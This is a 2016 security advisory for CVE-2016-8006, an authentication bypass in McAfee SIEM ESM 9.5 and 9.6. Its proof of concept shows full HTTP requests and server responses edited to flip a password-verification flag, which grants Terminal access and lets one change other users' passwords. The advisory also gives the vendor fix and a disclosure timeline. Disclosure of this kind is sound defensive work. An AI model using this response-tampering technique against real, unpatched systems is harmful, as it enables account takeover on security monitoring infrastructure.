McAfee SIEM 9.6 Authentication bypass vulnerability

McAfee SIEM 9.6 Authentication bypass vulnerability

Date: 12/09/2016
Author: Nico Proietti


Affected Product: McAfee SIEM 9.6 MR3, 9.5 and earlier releases
Credits: Vulnerability discovered by Nico Proietti and Claudio Cinquino of Quantum Leap S.R.L
CVE: CVE-2016-8006

Description Summary

A malicius administrative user can make changes to other SIEM users information including user passwords and also can use the GUI "Terminal" commands on an active logged-in admin user without supplying the logged-in admin password a second time.

Proof of Concept

Authentication Bypass vulnerability has been detected on "Users and Groups" and "Terminal"forms in McAfee SIEM ESM 9.5.x and 9.6.x. For Authentication Bypass, set in password form any password and change response.

Example of GUI Terminal access bypassing the admin password supplied.

Request:
POST /ess HTTP/1.1
Host: 192.168.164.110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: https://192.168.164.110/Application.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 72

Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

Original Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:13:57 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

Edited Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:13:57 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14


Example of bypass vulnerability on Users and Groups.

Request:
POST /ess HTTP/1.1
Host: 192.168.164.110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: https://192.168.164.110/Application.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 72

Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

Original Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:08:31 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

Edited Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:08:31 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14


Solution

To fix the security issue we recommend to update at new version to SIEM 9.6.0 MR3+, the vendor has resolved this issue.

Disclosure Timeline

11/05/2016 - Vulnerability Discovered
12/05/2016 - Initial vendor notification
09/09/2016 - The vendor fixed the vulnerability
09/09/2016 - The vendor public Knowledge Bulletin

References

[1] https://www.owasp.org/index.php/Category:Authentication_Vulnerability
[2] http://cwe.mitre.org/data/definitions/592.html
[3] https://kc.mcafee.com/corporate/index?page=content&id=KB87744